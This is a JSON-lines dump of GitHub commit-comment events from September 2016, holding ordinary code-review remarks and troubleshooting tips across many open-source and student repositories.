{"id":"4624776985","type":"CommitCommentEvent","actor":{"login":"gaearon"},"repo":{"name":"facebookincubator/create-react-app"},"payload":{"comment":{"id":19192077,"position":23,"line":78,"path":"packages/react-scripts/package.json","commit_id":"dc6074abbc7ada0bb19b8828dddadfc25b4bd06b","created_at":"2016-09-27T14:59:18Z","updated_at":"2016-09-27T14:59:18Z","body":"cc @fson Let’s just keep them here and see how it goes. If Travis can handle it, fine. Otherwise we should just let Lerna do its thing and rewrite `e2e` and `cra.sh` to *remove* things from `bundledDependencies` instead of adding them."}},"created_at":"2016-09-27T14:59:18Z"}
{"id":"4624780116","type":"CommitCommentEvent","actor":{"login":"JohnPhoto"},"repo":{"name":"nordnet/nordnet-next-api"},"payload":{"comment":{"id":19192086,"position":null,"line":null,"path":null,"commit_id":"5d62c1b37d2acb74be49a47518dbfd28526d43cb","created_at":"2016-09-27T14:59:47Z","updated_at":"2016-09-27T14:59:47Z","body":"Why is the function needed to be called on every call? Why not use the \"cached\" version?"}},"created_at":"2016-09-27T14:59:47Z"}
{"id":"4624780450","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19192088,"position":62,"line":77,"path":"src/main/java/org/spongepowered/api/event/cause/Cause.java","commit_id":"9368eed75e18c3b23eb5c26f91b9a958c841fd18","created_at":"2016-09-27T14:59:50Z","updated_at":"2016-09-27T14:59:50Z","body":"Right I'm aware...should we bother with varargs?"}},"created_at":"2016-09-27T14:59:50Z"}
{"id":"4624781334","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19192089,"position":59,"line":93,"path":"scripts/album.js","commit_id":"8dc4675a4f732667bc7f383bf73355251c9d3fcd","created_at":"2016-09-27T14:59:58Z","updated_at":"2016-09-27T14:59:58Z","body":"why did you start your index at 1? You should never look at the correct code before asking me for feedback and getting a working solution on your own"}},"created_at":"2016-09-27T14:59:58Z"}
{"id":"4624783793","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19192094,"position":61,"line":95,"path":"scripts/album.js","commit_id":"8dc4675a4f732667bc7f383bf73355251c9d3fcd","created_at":"2016-09-27T15:00:17Z","updated_at":"2016-09-27T15:00:17Z","body":"why did you name this function?"}},"created_at":"2016-09-27T15:00:17Z"}
{"id":"4624787684","type":"CommitCommentEvent","actor":{"login":"whitef0x0"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19192100,"position":20,"line":20,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-27T15:00:48Z","updated_at":"2016-09-27T15:00:48Z","body":"Why not use NSHomeDirectoryForUser[1] instead? Seems a lot more concise. \r\n\r\nReference 1: https://developer.apple.com/reference/foundation/1413447-nshomedirectoryforuser"}},"created_at":"2016-09-27T15:00:48Z"}
{"id":"4624788921","type":"CommitCommentEvent","actor":{"login":"MartiUK"},"repo":{"name":"cmderdev/cmder"},"payload":{"comment":{"id":19192106,"position":null,"line":null,"path":null,"commit_id":"9c0ad9fd8139809f612a73d8a51d840be05794ea","created_at":"2016-09-27T15:00:58Z","updated_at":"2016-09-27T15:00:58Z","body":"@alexandr-san4ez can you make a pull request? 👍 "}},"created_at":"2016-09-27T15:00:58Z"}
{"id":"4624791670","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19192121,"position":null,"line":null,"path":null,"commit_id":"5f93b2c2b1a1408a2dfe45fc471e0671c1938967","created_at":"2016-09-27T15:01:22Z","updated_at":"2016-09-27T15:01:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WfZ28glRST2hfFeGq6dwnQ"}},"created_at":"2016-09-27T15:01:22Z"}
{"id":"4624792741","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19192124,"position":null,"line":null,"path":null,"commit_id":"11558a86b45a65e01d49a46b6cf4ec0231f36aff","created_at":"2016-09-27T15:01:31Z","updated_at":"2016-09-27T15:01:31Z","body":"This looks useful for 3.9.1 too. :smile:"}},"created_at":"2016-09-27T15:01:31Z"}
{"id":"4624802738","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"poomponk/sbt-java-school"},"payload":{"comment":{"id":19192148,"position":7,"line":7,"path":"src/main/java/ru/sbt/java/home5/Account.java","commit_id":"f84692f81c6bf134c8b39e84747bd1e21e051f61","created_at":"2016-09-27T15:02:59Z","updated_at":"2016-09-27T15:02:59Z","body":"Напомните мне на занятии, расскажу почему pin нельзя хранить в виде строки."}},"created_at":"2016-09-27T15:02:59Z"}
{"id":"4624807135","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19192152,"position":5,"line":30,"path":"scripts/album.js","commit_id":"f4e5026d8b88de40b7a3d480383bd7c12fa1ff13","created_at":"2016-09-27T15:03:38Z","updated_at":"2016-09-27T15:03:38Z","body":"why did you add this space?"}},"created_at":"2016-09-27T15:03:38Z"}
{"id":"4624808708","type":"CommitCommentEvent","actor":{"login":"bermud"},"repo":{"name":"opengeospatial/ets-gpkg10"},"payload":{"comment":{"id":19192158,"position":null,"line":null,"path":null,"commit_id":"c97a23a52d3661e7efba24164b232d938a2083ff","created_at":"2016-09-27T15:03:52Z","updated_at":"2016-09-27T15:03:52Z","body":"Fixes #21 "}},"created_at":"2016-09-27T15:03:52Z"}
{"id":"4624813114","type":"CommitCommentEvent","actor":{"login":"amedranogil"},"repo":{"name":"universAAL/ontology"},"payload":{"comment":{"id":19192160,"position":41,"line":338,"path":"ont.cryptographic/src/main/java/org/universAAL/ontology/cryptographic/CryptographicOntology.java","commit_id":"465cd8919990faaf805c9ec34d7fe7acdf57697a","created_at":"2016-09-27T15:04:30Z","updated_at":"2016-09-27T15:04:30Z","body":"@universAAL/core  I am unsure this is the correct way to say this:\r\nfor AES the key length can be either 128, 192 OR 256. \r\nI created this union with hasValueRestrictions, my question is: will this work? "}},"created_at":"2016-09-27T15:04:30Z"}
{"id":"4624815071","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"DenisCarriere/geocoder"},"payload":{"comment":{"id":19192167,"position":null,"line":null,"path":null,"commit_id":"4c965abc38f3b8686ae98b53bf49028275605b20","created_at":"2016-09-27T15:04:48Z","updated_at":"2016-09-27T15:04:48Z","body":"@themiurgo Had some users getting blocked when they were using their premium Google for Work API which has a higher rate limit. Didn't know how to modify the rate limit based on specific user parameters instead of the overall function.\r\n\r\nStandard Google rate limit is 2500/day\r\nPremium Google for Work rate limit is 100,000/day\r\n\r\nHow do we make that work for the Google class?\r\n\r\nIt's only the case when the user provides `client`, `client_secret` and `key` that the rate limit should be increased to 100K/day."}},"created_at":"2016-09-27T15:04:48Z"}
{"id":"4624815747","type":"CommitCommentEvent","actor":{"login":"0ge"},"repo":{"name":"ThrowTheSwitch/Ceedling"},"payload":{"comment":{"id":19192168,"position":null,"line":null,"path":null,"commit_id":"61b3db601b8caf4e36145638a811e9f856cf6c76","created_at":"2016-09-27T15:04:53Z","updated_at":"2016-09-27T15:04:53Z","body":"Regarding version compatibility, I might add that I've also tested this under gcovr 3.2 on Mac OSX and it worked fine."}},"created_at":"2016-09-27T15:04:53Z"}
{"id":"4624816309","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19192169,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-27T15:04:59Z","updated_at":"2016-09-27T15:04:59Z","body":"@henrypp \r\nhttp://www.iosart.com/tools/charset-fixer/\r\nThis site is useful, but only himself to convert it."}},"created_at":"2016-09-27T15:04:59Z"}
{"id":"4624816347","type":"CommitCommentEvent","actor":{"login":"Bravo555"},"repo":{"name":"room23studios/pong"},"payload":{"comment":{"id":19192171,"position":39,"line":39,"path":"src/main.cpp","commit_id":"5b113c9cbf7559bfc7d41eabcd1ed24adab592c0","created_at":"2016-09-27T15:04:59Z","updated_at":"2016-09-27T15:04:59Z","body":"I know I'm annoying, but our style guide exists for a reason. Please, spend 5 minutes to make it look nicer :)"}},"created_at":"2016-09-27T15:04:59Z"}
{"id":"4624817001","type":"CommitCommentEvent","actor":{"login":"bermud"},"repo":{"name":"opengeospatial/ets-gpkg10"},"payload":{"comment":{"id":19192173,"position":null,"line":null,"path":null,"commit_id":"dc1b868bb7b899cb61a0bded6122e9a21c38970b","created_at":"2016-09-27T15:05:05Z","updated_at":"2016-09-27T15:05:05Z","body":"Fixes #24 "}},"created_at":"2016-09-27T15:05:05Z"}
{"id":"4624818325","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":19192175,"position":null,"line":null,"path":null,"commit_id":"c503a63b14d2f36359fc32bfabdf2ab8bdfbcbcb","created_at":"2016-09-27T15:05:17Z","updated_at":"2016-09-27T15:05:17Z","body":"Unused so under #173..."}},"created_at":"2016-09-27T15:05:17Z"}
{"id":"4624819671","type":"CommitCommentEvent","actor":{"login":"stefanhusmann"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":19192183,"position":null,"line":null,"path":null,"commit_id":"91e52266bce107cd57f051dd0d75fc398e4a8124","created_at":"2016-09-27T15:05:28Z","updated_at":"2016-09-27T15:05:28Z","body":"I think a closing \")\" is mising at the end of line 163."}},"created_at":"2016-09-27T15:05:28Z"}
{"id":"4624821981","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19192190,"position":157,"line":133,"path":"validation-services-parent/xroad-validation-service/src/main/java/ee/openeid/siva/xroad/validation/XROADQualifiedReportBuilder.java","commit_id":"50bbd4d5ff61ee486c33285cc1121f3dd47026af","created_at":"2016-09-27T15:05:48Z","updated_at":"2016-09-27T15:05:48Z","body":"We should delete this method and use StringUtils.EMPTY for all places where this method is used"}},"created_at":"2016-09-27T15:05:48Z"}
{"id":"4624823095","type":"CommitCommentEvent","actor":{"login":"whitef0x0"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19192197,"position":49,"line":49,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-27T15:05:58Z","updated_at":"2016-09-27T15:05:58Z","body":"We should log the error object as well."}},"created_at":"2016-09-27T15:05:58Z"}
{"id":"4624824792","type":"CommitCommentEvent","actor":{"login":"ggaillard"},"repo":{"name":"LSWSIO/mission-individuelle-ggaillard"},"payload":{"comment":{"id":19192202,"position":null,"line":null,"path":null,"commit_id":"91a1d054e5dbbe81b84ab996099df4f4b0db8d5a","created_at":"2016-09-27T15:06:13Z","updated_at":"2016-09-27T15:06:13Z","body":"restaurer la version de Yannick"}},"created_at":"2016-09-27T15:06:13Z"}
{"id":"4624824927","type":"CommitCommentEvent","actor":{"login":"amedranogil"},"repo":{"name":"universAAL/ontology"},"payload":{"comment":{"id":19192203,"position":49,"line":346,"path":"ont.cryptographic/src/main/java/org/universAAL/ontology/cryptographic/CryptographicOntology.java","commit_id":"465cd8919990faaf805c9ec34d7fe7acdf57697a","created_at":"2016-09-27T15:06:14Z","updated_at":"2016-09-27T15:06:14Z","body":"@universAAL/core in actuality the previous property is to make explicit something that is related to the SimpleKey.PROP_KEY_TEXT length.\r\nI guess I have to use a Length Restriction, but will it work over a Base64Binary Type (like this property is)?"}},"created_at":"2016-09-27T15:06:14Z"}
{"id":"4624826709","type":"CommitCommentEvent","actor":{"login":"whitef0x0"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19192209,"position":49,"line":49,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-27T15:06:30Z","updated_at":"2016-09-27T15:06:30Z","body":"\r\nhttps://developer.apple.com/library/content/documentation/Swift/Conceptual/Swift_Programming_Language/ErrorHandling.html for details "}},"created_at":"2016-09-27T15:06:30Z"}
{"id":"4624829162","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19192215,"position":null,"line":null,"path":null,"commit_id":"2b022d9a04c2856025e7f9f375bbaaadd38f46d2","created_at":"2016-09-27T15:06:52Z","updated_at":"2016-09-27T15:06:52Z","body":"Hm. This didnt happen for me in ages"}},"created_at":"2016-09-27T15:06:52Z"}
{"id":"4624829508","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19192216,"position":142,"line":122,"path":"validation-services-parent/xroad-validation-service/src/main/java/ee/openeid/siva/xroad/validation/XROADQualifiedReportBuilder.java","commit_id":"50bbd4d5ff61ee486c33285cc1121f3dd47026af","created_at":"2016-09-27T15:06:55Z","updated_at":"2016-09-27T15:06:55Z","body":"We should consider extracting all the private methods into utility class some of the methods can be made static"}},"created_at":"2016-09-27T15:06:55Z"}
{"id":"4624832107","type":"CommitCommentEvent","actor":{"login":"amedranogil"},"repo":{"name":"universAAL/ontology"},"payload":{"comment":{"id":19192223,"position":19,"line":71,"path":"ont.cryptographic/src/main/java/org/universAAL/ontology/CryptographicFactory.java","commit_id":"465cd8919990faaf805c9ec34d7fe7acdf57697a","created_at":"2016-09-27T15:07:17Z","updated_at":"2016-09-27T15:07:17Z","body":"This should ensure these classes are Singleton, but is this an accepted method?"}},"created_at":"2016-09-27T15:07:17Z"}
{"id":"4624834295","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19192233,"position":null,"line":null,"path":null,"commit_id":"2a265a90a6fb35dbfd841c35f20041dae02e63a0","created_at":"2016-09-27T15:07:36Z","updated_at":"2016-09-27T15:07:36Z","body":"But supports torches lol"}},"created_at":"2016-09-27T15:07:36Z"}
{"id":"4624834450","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19192235,"position":198,"line":186,"path":"validation-services-parent/xroad-validation-service/src/main/java/ee/openeid/siva/xroad/validation/XROADQualifiedReportBuilder.java","commit_id":"50bbd4d5ff61ee486c33285cc1121f3dd47026af","created_at":"2016-09-27T15:07:38Z","updated_at":"2016-09-27T15:07:38Z","body":"Method can be deleted"}},"created_at":"2016-09-27T15:07:38Z"}
{"id":"4624834964","type":"CommitCommentEvent","actor":{"login":"jinhoyim"},"repo":{"name":"jinhoyim/FDS"},"payload":{"comment":{"id":19192236,"position":null,"line":null,"path":null,"commit_id":"9ab9ac727c022bb0d365f3c713d216a91b1fed43","created_at":"2016-09-27T15:07:42Z","updated_at":"2016-09-27T15:07:42Z","body":"메인 index 테스트"}},"created_at":"2016-09-27T15:07:42Z"}
{"id":"4624835657","type":"CommitCommentEvent","actor":{"login":"aaronbieber"},"repo":{"name":"peterlebrun/dotfiles"},"payload":{"comment":{"id":19192237,"position":null,"line":null,"path":null,"commit_id":"27387eee3bf56260e8b34be986045a00c92503f9","created_at":"2016-09-27T15:07:48Z","updated_at":"2016-09-27T15:07:48Z","body":"Glad you found some utility there! 👍 "}},"created_at":"2016-09-27T15:07:48Z"}
{"id":"4624838072","type":"CommitCommentEvent","actor":{"login":"jinhoyim"},"repo":{"name":"jinhoyim/FDS"},"payload":{"comment":{"id":19192241,"position":null,"line":null,"path":null,"commit_id":"deadcc044aa8e5ce471e4787fa3102cdcb09f1ee","created_at":"2016-09-27T15:08:10Z","updated_at":"2016-09-27T15:08:10Z","body":"하위폴더 index 테스트"}},"created_at":"2016-09-27T15:08:10Z"}
{"id":"4624839167","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"dmayer/idb"},"payload":{"comment":{"id":19192244,"position":106,"line":null,"path":"lib/lib/device.rb","commit_id":"6f46da7bc903a86b804287c96f88d622f9b7b628","created_at":"2016-09-27T15:08:19Z","updated_at":"2016-09-27T15:08:19Z","body":"I think we can remove that function. Since we are cleaning up "}},"created_at":"2016-09-27T15:08:19Z"}
{"id":"4624839234","type":"CommitCommentEvent","actor":{"login":"mihkels"},"repo":{"name":"open-eid/SiVa"},"payload":{"comment":{"id":19192247,"position":209,"line":193,"path":"validation-services-parent/xroad-validation-service/src/main/java/ee/openeid/siva/xroad/validation/XROADQualifiedReportBuilder.java","commit_id":"50bbd4d5ff61ee486c33285cc1121f3dd47026af","created_at":"2016-09-27T15:08:20Z","updated_at":"2016-09-27T15:08:20Z","body":"Method can be deleted or we can replace with single method like valueNotPresent()"}},"created_at":"2016-09-27T15:08:20Z"}
{"id":"4624841539","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"dmayer/idb"},"payload":{"comment":{"id":19192255,"position":123,"line":null,"path":"lib/lib/device.rb","commit_id":"6f46da7bc903a86b804287c96f88d622f9b7b628","created_at":"2016-09-27T15:08:41Z","updated_at":"2016-09-27T15:08:41Z","body":"Same for the entire compilation code "}},"created_at":"2016-09-27T15:08:41Z"}
{"id":"4624846357","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19192268,"position":5,"line":90,"path":"contrib/windows/msys_build.sh","commit_id":"c8e090ca778f5f99d7b1dba56c04c2de56b4782b","created_at":"2016-09-27T15:09:22Z","updated_at":"2016-09-27T15:09:22Z","body":"Can this be added back? Ref https://github.com/JuliaLang/julia/pull/16202 `mkdir -p usr/bin` or `mkdir -p usr` is probably enough now."}},"created_at":"2016-09-27T15:09:22Z"}
{"id":"4624847511","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"poomponk/sbt-java-school"},"payload":{"comment":{"id":19192274,"position":4,"line":4,"path":"src/main/java/ru/sbt/java/home5/customExceptions/AccountIsLockedException.java","commit_id":"f84692f81c6bf134c8b39e84747bd1e21e051f61","created_at":"2016-09-27T15:09:34Z","updated_at":"2016-09-27T15:09:34Z","body":"Exception реализует Serializable => ему нужно добавить поле serialVersionUID. Правда об этом через занятие."}},"created_at":"2016-09-27T15:09:34Z"}
{"id":"4624847639","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19192276,"position":null,"line":null,"path":null,"commit_id":"3581792e3d0642a4f529f3c03d8cf15744aeabf3","created_at":"2016-09-27T15:09:35Z","updated_at":"2016-09-27T15:09:35Z","body":"I just finished Parts I and II today."}},"created_at":"2016-09-27T15:09:35Z"}
{"id":"4624848512","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"dmayer/idb"},"payload":{"comment":{"id":19192280,"position":178,"line":null,"path":"lib/lib/device.rb","commit_id":"6f46da7bc903a86b804287c96f88d622f9b7b628","created_at":"2016-09-27T15:09:44Z","updated_at":"2016-09-27T15:09:44Z","body":"Huh. The `rescue` was commented?"}},"created_at":"2016-09-27T15:09:44Z"}
{"id":"4624855481","type":"CommitCommentEvent","actor":{"login":"tiagochst"},"repo":{"name":"BioinformaticsFMRP/TCGAbiolinks"},"payload":{"comment":{"id":19192295,"position":14,"line":57,"path":"R/TCGAanalyze.R","commit_id":"fdb6bb9f0ece8968ba7333b2a555a07d754e3d80","created_at":"2016-09-27T15:10:45Z","updated_at":"2016-09-27T15:10:45Z","body":"@torongs82 why below is raw_count and now is raw_counts?"}},"created_at":"2016-09-27T15:10:45Z"}
{"id":"4624855825","type":"CommitCommentEvent","actor":{"login":"dmayer"},"repo":{"name":"dmayer/idb"},"payload":{"comment":{"id":19192296,"position":null,"line":null,"path":null,"commit_id":"6f46da7bc903a86b804287c96f88d622f9b7b628","created_at":"2016-09-27T15:10:48Z","updated_at":"2016-09-27T15:10:48Z","body":"This seems fine "}},"created_at":"2016-09-27T15:10:48Z"}
{"id":"4624858839","type":"CommitCommentEvent","actor":{"login":"sgkang"},"repo":{"name":"ubcgif/em_examples"},"payload":{"comment":{"id":19192300,"position":4,"line":6,"path":"requirements.txt","commit_id":"dfb3a0b226f282c0d2a43c001329156f9428e724","created_at":"2016-09-27T15:11:15Z","updated_at":"2016-09-27T15:11:15Z","body":"True, but this was a fix for binder. It did not know em_examples as a package. \r\nThere might be better way for this purpose. "}},"created_at":"2016-09-27T15:11:15Z"}
{"id":"4624860132","type":"CommitCommentEvent","actor":{"login":"mccalluc"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":19192304,"position":null,"line":null,"path":null,"commit_id":"5d1e8c9a1054fccb5730f46a65cfa29a00cd620c","created_at":"2016-09-27T15:11:25Z","updated_at":"2016-09-27T15:11:25Z","body":"Just went ahead with it: #166. Hope that's ok?"}},"created_at":"2016-09-27T15:11:25Z"}
{"id":"4624864945","type":"CommitCommentEvent","actor":{"login":"Exilz"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19192315,"position":null,"line":null,"path":null,"commit_id":"a36ccf227d16d9514846a40bd6f2a043d7537de2","created_at":"2016-09-27T15:12:07Z","updated_at":"2016-09-27T15:12:07Z","body":"If you ended up here because you can't start your packager after upgrading to > 0.35-rc.0, you need to wipe your cache.\r\n\r\n`rm -rf $TMPDIR/react-* && watchman watch-del-all && npm cache clean`"}},"created_at":"2016-09-27T15:12:07Z"}
{"id":"4624865990","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf-plugins-extras"},"payload":{"comment":{"id":19192317,"position":6,"line":21,"path":"CMakeLists.txt","commit_id":"d328a40482df63724e0a2b785d99a9045253fe22","created_at":"2016-09-27T15:12:17Z","updated_at":"2016-09-27T15:12:17Z","body":"Use pkg-config for this."}},"created_at":"2016-09-27T15:12:17Z"}
{"id":"4624868357","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19192325,"position":8,"line":8,"path":"src/ru/sberbank/school/homework5/Account.java","commit_id":"4618a7cc49b48ebfb3c30af9b4f21003d6c7c4dd","created_at":"2016-09-27T15:12:38Z","updated_at":"2016-09-27T15:12:38Z","body":"Логику по созданию номера аккаунта необходимо вынести в специальный для того обработчик."}},"created_at":"2016-09-27T15:12:38Z"}
{"id":"4624870651","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19192330,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T15:12:59Z","updated_at":"2016-09-27T15:12:59Z","body":"@Ninos @mikerhyner \r\n\r\nFor now, I'll cover this bug as follow:\r\n\r\n```\r\n# Override proxy errors\r\nProxyErrorOverride On\r\n# Workaround for https://bz.apache.org/bugzilla/show_bug.cgi?id=55415\r\n# This doesn't cover any custom ErrorDocument set through .htaccess files,\r\n# such as in Owncloud software.\r\n<IfModule mod_proxy_fcgi.c>\r\n    <Location /errors/>\r\n        ProxyErrorOverride Off\r\n    </Location>\r\n</IfModule>\r\n```\r\n\r\nin the 00_nameserver.conf file. Those which have custom ErrorDocument defined in their .htaccess file will have to ask their administrator to add the required Location block into the /etc/apache2/imscp/domain.tld file."}},"created_at":"2016-09-27T15:12:59Z"}
{"id":"4624873099","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf-plugins-extras"},"payload":{"comment":{"id":19192338,"position":47,"line":366,"path":"dnf-plugins-extras.spec","commit_id":"d328a40482df63724e0a2b785d99a9045253fe22","created_at":"2016-09-27T15:13:23Z","updated_at":"2016-09-27T15:13:23Z","body":"Not needed as plugin does this."}},"created_at":"2016-09-27T15:13:23Z"}
{"id":"4624874499","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf-plugins-extras"},"payload":{"comment":{"id":19192341,"position":55,"line":371,"path":"dnf-plugins-extras.spec","commit_id":"d328a40482df63724e0a2b785d99a9045253fe22","created_at":"2016-09-27T15:13:35Z","updated_at":"2016-09-27T15:13:35Z","body":"Bad idea "}},"created_at":"2016-09-27T15:13:35Z"}
{"id":"4624876146","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192345,"position":12,"line":10,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:13:49Z","updated_at":"2016-09-27T15:13:49Z","body":"Не нужно, на 67 строке явно же указано, что только POST работает."}},"created_at":"2016-09-27T15:13:49Z"}
{"id":"4624877819","type":"CommitCommentEvent","actor":{"login":"Nanomani"},"repo":{"name":"pydio/pydio-core"},"payload":{"comment":{"id":19192351,"position":null,"line":null,"path":null,"commit_id":"6066668c2de7b61fa825dd03ae12bad7af570546","created_at":"2016-09-27T15:14:02Z","updated_at":"2016-09-27T15:14:02Z","body":"after more test. It is not perfect :-/ \r\nMenu \"download\" on selected file or folder works well but not with the menu \"Compress\""}},"created_at":"2016-09-27T15:14:02Z"}
{"id":"4624878517","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19192353,"position":19,"line":19,"path":"src/ru/sberbank/school/homework5/TerminalImpl.java","commit_id":"4618a7cc49b48ebfb3c30af9b4f21003d6c7c4dd","created_at":"2016-09-27T15:14:09Z","updated_at":"2016-09-27T15:14:09Z","body":"Аналогично, терминал не должен сам присваивать себе идентификаторы"}},"created_at":"2016-09-27T15:14:09Z"}
{"id":"4624879527","type":"CommitCommentEvent","actor":{"login":"neexee"},"repo":{"name":"nsuJolie/flask"},"payload":{"comment":{"id":19192355,"position":13,"line":11,"path":"asinc_hello.py","commit_id":"4a8af4ccf1c3dd369885e2e430f7efa876a946c7","created_at":"2016-09-27T15:14:17Z","updated_at":"2016-09-27T15:14:17Z","body":"Нехорошо называть переменную так же, как импортированный модуль."}},"created_at":"2016-09-27T15:14:17Z"}
{"id":"4624879786","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf-plugins-extras"},"payload":{"comment":{"id":19192356,"position":1,"line":1,"path":"etc/systemd/CMakeLists.txt","commit_id":"d328a40482df63724e0a2b785d99a9045253fe22","created_at":"2016-09-27T15:14:20Z","updated_at":"2016-09-27T15:14:20Z","body":"No need for set() as you can use it directly in install()"}},"created_at":"2016-09-27T15:14:20Z"}
{"id":"4624880956","type":"CommitCommentEvent","actor":{"login":"chibill"},"repo":{"name":"NORCatUofC/rain"},"payload":{"comment":{"id":19192359,"position":37,"line":41,"path":"nexrad-etl/NEXRAD Download and Process.ipynb","commit_id":"3b7b227547efb8f682c1b6a907eaca5d77743540","created_at":"2016-09-27T15:14:30Z","updated_at":"2016-09-27T15:14:30Z","body":"The url does not exist. HAS010805581 seems to no longer be on that page for some reason."}},"created_at":"2016-09-27T15:14:30Z"}
{"id":"4624884531","type":"CommitCommentEvent","actor":{"login":"ThatNearsightedGuy"},"repo":{"name":"anderssonjohn/Welcome"},"payload":{"comment":{"id":19192368,"position":null,"line":null,"path":null,"commit_id":"5dddb8cf765d124a06cc6878573db98a4b7e9f3d","created_at":"2016-09-27T15:15:03Z","updated_at":"2016-09-27T15:15:03Z","body":"I hear you"}},"created_at":"2016-09-27T15:15:03Z"}
{"id":"4624887972","type":"CommitCommentEvent","actor":{"login":"Nannanbeibei"},"repo":{"name":"Nannanbeibei/text"},"payload":{"comment":{"id":19192377,"position":null,"line":null,"path":null,"commit_id":"e30d0b5731ed1bafcfd6c765d5cfa5a9a9a9639c","created_at":"2016-09-27T15:15:33Z","updated_at":"2016-09-27T15:15:33Z","body":"dC"}},"created_at":"2016-09-27T15:15:33Z"}
{"id":"4624888607","type":"CommitCommentEvent","actor":{"login":"OnsetJon"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19192381,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-27T15:15:39Z","updated_at":"2016-09-27T15:15:39Z","body":"I believe there is an issue here.  We were testing this code and found that when the root is power cycled, some motes would never send an RPL message again.  We found that busySendingDAO was set to true and never cleared.  I believe the fix is to clear both flags if an attempt is made to send a DAO or DIO when the mote is not synchronized.  Otherwise, the code will only clear one of the flags, and then clear the packet buffers, which will cause the other to remain true."}},"created_at":"2016-09-27T15:15:39Z"}
{"id":"4624888680","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf-plugins-extras"},"payload":{"comment":{"id":19192382,"position":49,"line":113,"path":"plugins/system_upgrade.py","commit_id":"d328a40482df63724e0a2b785d99a9045253fe22","created_at":"2016-09-27T15:15:39Z","updated_at":"2016-09-27T15:15:39Z","body":"Honestly I don't like it. I hope this should be just on packaging level."}},"created_at":"2016-09-27T15:15:39Z"}
{"id":"4624888876","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"NL-4-DEVS/PocketRPG"},"payload":{"comment":{"id":19192384,"position":null,"line":null,"path":null,"commit_id":"c88192636f572228f9eac795e18916f6541b0356","created_at":"2016-09-27T15:15:41Z","updated_at":"2016-09-27T15:15:41Z","body":"So it's fixed now?"}},"created_at":"2016-09-27T15:15:41Z"}
